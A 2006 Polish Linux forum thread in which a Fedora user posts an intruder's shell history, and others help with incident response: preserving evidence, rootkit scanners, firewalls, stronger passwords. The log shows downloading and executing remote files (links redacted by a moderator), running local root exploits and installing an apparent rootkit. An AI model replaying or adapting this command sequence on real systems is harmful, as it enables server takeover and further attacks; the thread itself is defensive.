narrow Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 (edytowane) Witam! mam problem jakis czas temu z obcemu IP ktos sie wdarl na moj serwer na konto uzytkownika i mam liste polecen ktore wykonal na moim serwerze: w uname -a ls cd /tmp cd .tmp mkdir .tmp cd .tmp wget link_usunięty_przez_modratora/loco1/aVe.txt;chmod 777 * ./aVe.txt ./aVe.txt id wget link_usunięty_przez_modratora/loco1/uselib24;chmod 777 * ./uselib24 id uname -a wget link_usunięty_przez_modratora/loco1/krad chmod 777 * ./krad 1 ./krad 2 ./krad 3 ./krad 4 ./krad 5 ./krad 6 ./krad 7 ./krad 8 ./krad 9 passwd passwd passwd ls cat /etc/hosts wget link_usunięty_przez_modratora/loco1/unixcod.tar.gz;tar zxf unixcod.tar.gz;cd unixcod;wget link_usunięty_przez_modratora/loco1/root mv root data.conf ./unix 83.14 cd .. cd / /sbin/add logout nie bardzo wiem o co chodzi i czy cos wskoral dzis dostalem maila od jakiejs firmy ze ktos z mojego serwera probowal sie do nich wlamywac metoda slownikowa o dziwo do mnie codzinnie mam po kilkanascie a nawet dziesiat prob wlamania ta sama metoda tyle ze z roznych IP co radzicie? Edytowane Marzec 22, 2006 przez _PaT Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 co radzicie? Zainteresować się bezpieczeństwem Był tu niedawno wątek nt. bezpieczeństwa serwera http://forum.fedora.pl/index.php?showtopic=9720&hl= Oczywiście na stacji roboczej nie potrzeba aż tyle, ale zacząłbym od zrobienia dobrego firewall'a (można znaleźć niezłe przykłady z opisami tu na forum - poszukaj użytkownik ati, hasło iptables, w części "szukaj postów od" zaznacz kiedykolwiek) Druga rzecz to zapoznaj się ze snortem - system detekcji włamań. Poza tym jak wiesz o włamaniach, to zbieraj logi i możliwie najwięcej informacji przesyłaj do swojego dostawcy internetu, a jeśli możesz namierzyć adres atakującego to również do jego providera. Zazwyczaj są to adresy abuse@... (np. dla serwera users.volja.net jest to [email protected]) Szczegóły można sprawdzić przez polecenie "whois <IP address>" lub w formie bardziej przyjaznej np. na http://www.ripe.net/ No i może jeszcze użyj poleceń "chrootkit" oraz "rkhunter" - możesz mieć (i zapewne masz) zainstalowane tzw.rootkity, chociaż szanujący się hacker napisze raczej własny, który przez jakiś czas nie będzie rozpoznawany przez standardowe narzędzia. Ale warto spróbować. [EDIT] nie "chrootkit" tylko "chkrootkit" - sorki. Pozdr, W. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
puchatek_nerwus Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 co ty masz za hasla ? 12345 ? to jest twoje haslo na root`a ? przepraszam ze krytykuje... aczkolwiek do takiej sytuacji nie powinno dojsc... a po 2 sprawdz skad jest tamten user i napisz do admina... Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
walwat Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Wygląda to źle. Z tego co mogę przeczytać, ktoś wylistował ci użytkowników, potem na konto jednego z nich sie zalogował (popracuj nad hasłami). Stworzył katalog .tmp, załadował pliki aVe i uselib, potem coś co mnie niepokoi czyli krad, a na koniec pewnie rootkita - ostatnie wpisy. Z tego kompa atakuje potem twoją firmę. Jak najszybciej odłącz kompa od sieci i zbierz z logów tyle informacji ile możesz, a potem radzę nic nie usuwać takimi narzedziami jak chkrootkit, tylko jaśli możesz sobie na to pozwolić (czytaj odłączyć kompa na jakiś czas) to nie bawiąc się w żadne pisanie na abuse (to trwa długo i mało prawdopodobne abyś coś w ten sposób wskórał), zgłoś to na policję. To było na 100 % włamanie i zainstalowanie jakiegoś syfu. Załącz dysk twardy jako dowód. Jeśli decydujesz się sam sobie z tym poradzić, to przeszukaj ręcznie te ścieżki i pliki, które widzisz w logach, pokopiuj obce pliki (jako dowód na przyszłość). Potem chkrootkit, ale jego najnowsza wersja ze strony domowej chkrootkita, zainstaluj jakiś antywirus (np. F-prot, albo Bit Defender - paczki .rpm sa na stronach tych programów) Kopiuj pliki, które usuwasz (gdzieś na boczku, np na CDROM). Jeśli te programy znajdą to co już sam znalazłeś to dobrze, problem pewnie z głowy, jeśli nie to, pozostaje ci reinstalka Fedory. A potem na czystej instalacji zainstaluj sobie te narzędzia, o których pisałem i aide. Jest to program, który wylistuje ci wszystkie zmienione pliki w systemi, ale to ma sens na czystej instalacji i uaktualniać bazę po każdych operacjach/ instalacjach w systemie, albo regularnie np co tydzień. Teraz na to już jest za póżno. Koniecznie wzmocnij hasła !!! O dobrym firewallu nie pisze, bo to obowiązek. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Gość amdfanatyk Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 przede wszystkim to wywalcie ten cytat bo to jest instrukcja w pigulce; pobralem ten syf zeby sie mu troche przyjrzec ale na doglebna analize nie mam czasu; Local Root exploit based on do_brk and do_munmap transformed by bcb5b7f1d2a11b2d50956934d301f2f7 POLAND Menu: 1. do_munmap attack (Tested on kernels 2.x.x) 2. do_brk attack (Tested on kernels from 2.4.18 to 2.4.22) wyglada na to, ze odpalil 3 exploity, z ktorych 2 pierwsze zapewne nie zadzialaly no a na koncu zabral sie do bruteforce'owania ssh. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Gość _PaT Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 przede wszystkim to wywalcie ten cytat bo to jest instrukcja w pigulce; Ktoś popiera ten pomysł? Wydaje mi się, że taki cytat służy uświadamianiu, jak niewinnie może wyglądać włamanie. Jeśli ktoś chce "pigułkę", to ma google. Jestem za tym, aby nie usuwać (a także nie próbować się włamywać). Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Potem chkrootkit, ale jego najnowsza wersja ze strony domowej chkrootkita, Jaka jest różnica między tym co jest na stronie domowej chkrootkit a wersją w repo yuma? Z tego co widzę ostatnia aktualizacja była w październiku ubiegłego roku. W repo i na stronie można pobrać wersję 0.46a - niby to samo, więc ciekawi mnie czy to tylko odruch pobierania źródeł u samego źródła czy jakieś inne przesłanki? BTW: ja oczywiście jak zwykle zacząłem z rozpędu, ale podstawowa sprawa to chyba to o czym napisał walwat - zabezpieczyć kopię dysku a przynajmniej logów dla prokuratora. W razie jakieś sprawy przeciwko Tobie będziesz mógł się łatwiej wybronić, że Twój komp to było tylko zombie. [Edit] Wg mnie cytat powinien zostać. Nie wszyscy wiedzą na co zwracać uwagę, a tu widać kilka ciekawych rzeczy. Bez cyctatu komentarze stają się nieczytelne i daja jakąś wiedzę tylko założycielowi wątku a nie o to chyba chodzi na forum. Pozdr, W. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
walwat Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Jest różnica, te wersje na stronie domowej są uaktualniane o nowe syfy, coś jak uaktualnianie bazy wirusów w programach antywirusowych. Może nie tak często, ale jednak. Jeśli w repo jest aktualny, to tylko plus dla Fedory. Ja korzystam z oryginalnych. Szkoda, że nie ma updete'u on line... walwat Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Jest różnica, te wersje na stronie domowej są uaktualniane o nowe syfy, coś jak uaktualnianie bazy wirusów w programach antywirusowych. Czyli pomimo, że wersja jest ta sama to zawartość tarballa ze strony może być "bogatsza" niż RPM-a w repo? A nie ma możliwości ściągnięcia jakiegoś pliku z wzorcami rootkitów (tak wzorem av właśnie)? Bo takie ciągłe rekompilacje to mi się jakoś niezbyt uśmiechają A że nie ma update'u online to faktycznie szkoda, jeśli to taka historia jak mówisz. Pozdr, W. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
walwat Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Tego, czy w obrębie jednej wersji są dokonywane uaktualnienia to nie wiem. Ja na wszelki wypadek biore te ze strony projektu, aby nie czekać na robienie .rpm pod Fedore. Tak robie w przypadku tylko tego jednego programu (w Fedorze) - to przyzwyczajenie z BSD a proopo's pobierania źródeł. W mojej FC3 nowa paczka była z dużym opóźnieniem - pamiętam, że aktualizowana była w tym roku. walwat P.S. Odnośnie cytatu - uważam, że powinien zostać. Uświadomi to użytkowników, że o bezpieczeństwo szczególnie serwera trzeba zadbać, a nie ulegać złudnemu przekonaniu ( takie posty czytałem), że skoro to LinuX i na bazie RH, to już jest bezpiecznie. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Gość amdfanatyk Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 chodzi o to, ze tam sa funkcjonujace linki i kazdy tepak moze krok po kroku odtworzyc to, co juz zostalo zrobione; co do szukania przez google to jak taki los cos znajdzie to ten exploit i tak mu najczesciej nie zadziala (zwykle w kodzie zostawia sie drobne bledy uniemozliwiajace kompilacje) a jak nawet sie skompiluje to i tak nie bedzie wiedzial co dalej z nim zrobic. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Gość _PaT Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Jednak usunąłem linki, żeby komuś nie przyszło do głowy naśladować ataku. Nie chciałbym, aby ktoś z forumowiczów robiąc sobie żarty trafił na komisariat Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Gość amdfanatyk Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 chcialbym jeszcze zapytac autora tematu jakiego rodzaju uslugi uruchamia? zapewne ssh bo przez cos intruder sie zalogowal ew. zrobil zdalnie overflow; jesli na komputer mozna sie logowac lokalnie to najlepiej uzyc LIDS, mozna nim takze zablokowac mozliwosc otwierania portow (wtedy nici z bruteforce'owania), tak (_na prawde_ → naprawdę) ORT to mozna zablokowac nim "wszystko" zaleznie jak sie napisze reguly. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 chcialbym jeszcze zapytac autora tematu jakiego rodzaju uslugi uruchamia? zapewne ssh bo przez cos intruder sie zalogowal [...] W konfiguracji okna logowania jest takie coś gdzie zawsze biegam i odhaczam natychmiast: możliwość zdalnego logowania jako root (tekstowo i przez GDM) - to jest domyślne ("Ustawienia ekranu logowania", zakładka "Bezpieczeństwo"). No i nie dam głowy, ale chyba po świeżej instalacji można się logować zdalnie przez zwykłego telneta Jak ktoś tego od razu nie zmienia, to duża szansa na poważne "kuku" jak to miał "szczęście" odczuć na własnej skórze narrow Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
walwat Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Rozsądne wyjście - post został, ale bez linków. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się